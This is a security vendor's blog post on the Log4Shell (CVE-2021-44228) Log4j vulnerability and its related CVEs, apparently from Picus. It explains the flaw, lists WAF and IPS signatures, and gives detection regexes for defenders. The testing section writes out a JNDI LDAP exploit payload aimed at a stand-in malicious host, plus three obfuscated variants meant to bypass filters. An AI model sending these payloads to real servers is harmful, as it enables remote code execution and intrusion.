The Log4j Vulnerability Remediation with WAF and IPS
The Apache Log4j vulnerability wreaking havoc has a far greater impact than anticipated. We published a detailed blog post about the CVE-2021-44228 Log4j vulnerability and its exploitation on Friday, 10th December. However, in the past three days, we have seen that there is still a great panic despite a patch being available for Log4j.
When we looked at the reason for this situation, we realized that fully patching all vulnerable software was not that easy. You need to enumerate and patch all vulnerable systems and software in your environment, which is a time-consuming task.
However, most security teams don’t have enough time since attackers exploit the vulnerability in the wild. That is why we invested in our cybersecurity products. Security teams can use their existing network security controls, such as WAF, IPS, and NGFW, to prevent CVE-2021-44228 exploitation attacks and gain time for full patching. US CISA also recommends using a WAF so that your SOC can concentrate on fewer alerts.
This blog aims to help security teams gain time to fully mitigate and remediate their systems by explaining how to simulate CVE-2021-44228 attacks before attackers and how to utilize their existing security controls to prevent CVE-2021-44228 attacks.
Log4j Vulnerability Explained
Apache Log4j is a widely used Java library used in many commercial and open-source software products as a Java logging framework. The CVE-2021-44228 is a remote code execution (RCE) vulnerability that can be exploited without authentication. The vulnerability's criticality is rated as 10 (out of 10) in the common vulnerability scoring system (CVSS).
The vulnerability exists due to the Log4j processor's handling of log messages. Apache Log4j2 versions between 2.0 and 2.14.1 do not protect against attacker-controlled LDAP (Lightweight Directory Access Protocol) and other JNDI (Java Naming and Directory Interface) related endpoints. If an attacker sends a specially crafted message, this may result in the loading of an external code class and the execution of that code (RCE).
Test your security controls NOW: Prevent Log4Shell Exploits with Picus
Log4j Vulnerability Updates (CVE-2021-44832, CVE-2021-45105, CVE-2021-45046)
Update (December 28, 2021): A new vulnerability (CVE-2021-44832) is found in Apache Log4j2 versions 2.0-beta7 through 2.17.0. CVE-2021-44832 is an Arbitrary Code Execution vulnerability. Since it can be exploited by an attacker with permission to modify the logging configuration, its severity is lower than Log4Shell (CVE-2021-44228). Its base CVSS score is 6.6 (medium).This vulnerability is fixed in Log4j versions 2.17.1 (Java 8), 2.12.4 (Java 7) and 2.3.2 (Java 6).
Update (December 16, 2021) Recently, 2 new vulnerabilities have been found related to Log4j. Information leak and remote/local code execution (CVE-2021-45046) vulnerability was discovered on December 14th, 2021. Its CVSS score is 9.0 (critical)
CVE-2021-45046 is followed by CVE-2021-45105 which is a denial of service (DoS) vulnerability witch CVSS score of 7.5 (high).
Why Do I Need to Prevent CVE-2021-44228 Log4j Vulnerability?
CVE-2021-44228 vulnerability enables remote code executions on systems running vulnerable Log4j versions and allows the attacker full control of the affected server. Numerous organizations reported an increase in exploitation attempts for the vulnerability. For example, Deutsche Telekom CERT reported widespread attacks on their honeypot infrastructure via the Tor network.
The observed exploitation attempts so far have been used to distribute mass-malware such as Mirai2, Kinsing3, and Tsunami3 (aka Muhstik). These botnets are primarily used to launch distributed denial-of-service attacks (Mirai, Tsunami) or mine cryptocurrencies (Kinsing).
We are confident that this is the most critical vulnerability that has emerged in recent years.
Update: Microsoft Threat Intelligence Center says that nation state actors are adding new techniques to their arsenal utilizing Log4j vulnerabilities. Known APTs like HAFNIUM and PHOSPHORUS are using these vulnerabilities to improve their ransomware capabilities.
How Can I Prevent Log4j Vulnerability Exploitation Attacks?
You need to take the following steps regarding this vulnerability.
- Discover any assets using Apache Log4j in your environment.
- Patch all assets that use vulnerable versions of Log4j (version 2.0 - 2.14.1).
- Ensure that your security operations center (SOC) responds to each alert generated for vulnerable assets.
However, these tasks can take days, weeks, or even months regarding the size of your environment. Therefore, as Picus, we advise you to take the following immediate steps:
- Simulate Log4j exploitation attacks to test your security controls
- Enable relevant prevention signatures in your security controls
In the following sections, you can find how to test security controls against Log4j attacks and a list of prevention signatures provided by security vendors.
Update: Apache patched Log4j to remedy recent vulnerabilities, patching vulnerable versions of Log4j to version 2.17.0 is important to prevent exploitation.
How Can I Test My Security Controls Against Log4j Attacks?
The most basic Log4j exploit payload to test security controls is:
| ${jndi:ldap://malicious-ldap-server.com/a} | 
This exploit payload is explained in our previous blog. To measure the actual effectiveness of your security products against Log4J vulnerability exploitation attacks, you should test all valid variants of this Log4J exploit PoC payload. You can generate these variants with the following methods:
1- Using the payload in different parts of an HTTP request
CVE-2021-44228 exploit payloads can work in any part of an HTTP request:
- URL
- Request headers
- Body
Request headers include but are not limited to X-Api-Version, User-Agent, Cookie, Referer, Accept-Language, Accept-Encoding, Upgrade-Insecure-Requests, Accept, Origin, Pragma, and Content-Type. Note that some public PoC exploit scripts send payload in only the X-Api-Version header, but other headers can be used for exploitation.
2- Using the payload with different JNDI related naming services
Although most of the public Log4j exploit examples include LDAP, attackers exploit all JNDI related naming services:
- LDAP (Lightweight Directory Access Protocol)
- DNS (Domain Name System)
- RMI (Remote Method Invocation)
- NDS (Novell Directory Services)
- NIS (Network Information Service )
- CORBA (Common Object Request Broker Architecture)
3- Using bypass methods
Some security controls use strict keywords to detect malicious Log4j exploit codes. Attackers may evade these controls by obfuscating these keywords. For example, JNDI and the name service (e.g., LDAP, DNS) are obvious keywords included in CVE-2021-44228 exploit payloads. However, obfuscated versions of these keywords can be used in Log4j vulnerability exploitation attacks to obfuscate payload and bypass security controls, such as:
| ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://example.com/a} | 
| ${jndi:${lower:l}${lower:d}a${lower:p}://example.com/a} | 
| ${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}//example.com} | 
How Can I Test My Security Controls with Picus in Minutes?
In order to test your security controls manually, you can use the above payloads. However, generating all applicable payloads, setting up a test environment and testing your security controls against all these payloads is also a time-consuming process.
Fortunately, using the Picus platform, you can easily simulate Log4j CVE-2021-44228 vulnerability exploitation attacks within minutes to test the effectiveness of your security controls against Log4J attacks. Picus platform automatically simulates attacks without causing single damage to your environment and continuously validates your security controls.
Picus Threat Library includes the following attacks for Log4j CVE-2021-44228 vulnerability. Moreover, it contains 1500+ vulnerability exploitation attacks in addition to 11.000+ other threats currently.
Test your security controls NOW: Prevent Log4Shell Exploits with Picus
Update: Tables given below are updated in accordance with recently found CVE-2021-45046 and CVE-2021-45105 vulnerabilities.
| Threat ID | Action Name | Attack Module | 
| 21296 | Apache Log4j Web Attack Campaign | Web Application | 
Log4j Vulnerability Remediation Using F5, Citrix, Fortinet and ModSecurity WAFs
It is possible to prevent Log4J attacks using below signatures provided by network security vendors. Picus platform provides prevention signatures for CVE-2021-44228 and other vulnerabilities. The following table includes Web Application Firewall (WAF) signatures for the Log4j2 vulnerability (CVE-2021-44228).
| Security Control | Signature IDs | Signature Name | 
| F5 BIG-IP ASM | 200104768 | JNDI Injection Attempt (Parameter) | 
| F5 BIG-IP ASM | 200104772 | JNDI Injection Attempt (Content) | 
| F5 BIG-IP ASM | 200104769 | JNDI Injection Attempt (Header) | 
| F5 BIG-IP ASM | 200104768 | JNDI Injection Attempt (Parameter) | 
| F5 BIG-IP ASM | 200104723 | JNDI Injection Attempt (ldap) (Header) | 
| F5 BIG-IP ASM | 200104725 | JNDI Injection Attempt (rmi) (Header) | 
| F5 BIG-IP ASM | 200004451 | JSP Expression Language Expression Injection (2) (Header) | 
| F5 BIG-IP ASM | 200004450 | JSP Expression Language Expression Injection (2) (Parameter) | 
| F5 BIG-IP ASM | 200104773 | JSP Expression Language Expression Injection (3) (Content) | 
| F5 BIG-IP ASM | 200104771 | JSP Expression Language Expression Injection (3) (Header) | 
| F5 BIG-IP ASM | 200104770 | JSP Expression Language Expression Injection (3) (Parameter) | 
| F5 BIG-IP ASM | 200004474 | JSP Expression Language Expression Injection (3) (URI) | 
| FortiWeb Web Application Security | 90490119, 90490120 | Known Exploits | 
| Citrix Web App Firewall | 999078 | WEB-MISC Apache Log4j - Remote Code Execution Vulnerability via BODY (CVE-2021-44228) | 
| Citrix Web App Firewall | 999077 | WEB-MISC Apache Log4j - Remote Code Execution Vulnerability via FORM (CVE-2021-44228) | 
| Citrix Web App Firewall | 999079 | WEB-MISC Apache Log4j - Remote Code Execution Vulnerability via HEADER (CVE-2021-44228) | 
| Citrix Web App Firewall | 999080 | WEB-MISC Apache Log4j - Remote Code Execution Vulnerability via URL (CVE-2021-44228) | 
| Citrix Web App Firewall | 999077 | web-misc apache log4j - remote code execution vulnerability via form (cve-2021-44228) | 
| Citrix Web App Firewall | 999079 | web-misc apache log4j - remote code execution vulnerability via header (cve-2021-44228) | 
| ModSecurity | 932100 | Remote Command Execution: Unix Command Injection | 
| ModSecurity | 932130 | Remote Command Execution: Unix Shell Expression Found | 
Log4j Vulnerability Remediation Using Cisco, Check Point, Fortinet, Palo Alto Networks, Forcepoint and Snort IPSs and NGFWs
The following table includes Next Generation Firewall (NGFW) and Intrusion Prevention System (IPS) signatures for the Log4j vulnerability.
| Security Control | Signature IDs | Signature Name | 
| Forcepoint NGFW | Generic_CS-Log4j-Remote-Code-Execution | |
| Forcepoint NGFW | HTTP_CS_Log4j-Remote-Code-Execution | |
| Palo Alto Networks NGFW | 91991, 91994, 92001 | Apache Log4j Remote Code Execution Vulnerability | 
| Check Point NGFW | asm_dynamic_prop_CVE_2021_44228 | Apache Log4j Remote Code Execution (CVE-2021-44228) | 
| FortiGate NGFW | 51006 | Apache.Log4j.Error.Log.Remote.Code.Execution | 
| Cisco Firepower NGFW | 58723, 58724, 58725, 58726, 58727, 58728, 58729, 58730, 58731, 58732, 58733, 58722, 58723, 58724, 58725, 58737, 58738, 58739, 58742, 58744 | SERVER-OTHER Apache Log4j logging remote code execution attempt | 
| Snort IPS | 2034655 | ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228) | 
| Snort IPS | 2034647 | ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228) | 
| Snort IPS | 2034658 | ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228) | 
| Snort IPS | 2034648 | ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228) | 
| Snort IPS | 2034654 | ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228) | 
| Snort IPS | 2034668 | ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (CVE-2021-44228) | 
| Snort IPS | 2034649 | ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228) | 
| Snort IPS | 2034657 | ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228) | 
| Snort IPS | 2034650 | ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228) | 
| Snort IPS | 2034653 | ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228) | 
| Snort IPS | 2034667 | ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (CVE-2021-44228) | 
| Snort IPS | 2034651 | ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228) | 
| Snort IPS | 2034656 | ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228) | 
| Snort IPS | 2034652 | ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228) | 
| Snort IPS | 2034659 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass (CVE-2021-44228) | 
| Snort IPS | 2034659 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M1 (CVE-2021-44228) | 
| Snort IPS | 2034660 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass (CVE-2021-44228) | 
| Snort IPS | 2034673 | ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (CVE-2021-44228) | 
| Snort IPS | 2034661, 2034662 | ET INFO Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228) | 
| Snort IPS | 2034665, 2034666 | ET INFO Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228) | 
| Snort IPS | 2034663, 2034664 | ET INFO Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228) | 
| Snort IPS | 58723, 58724, 58725, 58726, 58727, 58728, 58729, 58730, 58731, 58732, 58733, 58722, 58725, 58737, 58738, 58739, 58744 | SERVER-OTHER Apache Log4j logging remote code execution attempt | 
| McAfee NSP | 0x4529f700 | HTTP: Apache Log4j2 Remote Code Execution Vulnerability (CVE-2021-44228) | 
| TippingPoint TPS | 40627 | HTTP: JNDI Injection in HTTP Request | 
Log4j Attack Detection and Log4j Exploit Discovery with Custom Signatures
If the network security product you are using is not included in the tables above, you can use the following regular expressions developed and validated by Picus Labs:
| Signature Name | Signature | 
| Generic Apache Log4J RCE Attempt | \$\{jndi\: | 
| Specific Apache Log4J RCE Attempt | \$\{jndi\:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[\/]?[^\n]+ | 
| Log4J RCE WAF Bypass Attempt (1) | \$\{jndi\:\${(lower|upper)\: | 
| Log4J RCE WAF Bypass Attempt (2) | \${\:\:-j}\${ | 
Log4j Vulnerable Versions
CVE-2021-44228 vulnerability affects Apache Log4j versions 2.0 to 2.14.1. SHA-256 hashes and default filenames of all vulnerable Log4j versions are given in our previous blog post.
 
    
    
    
    
    
    
    
   .png?width=353&height=200&name=Ivanti-EPMM-ET-preview-sept25%20(1).png)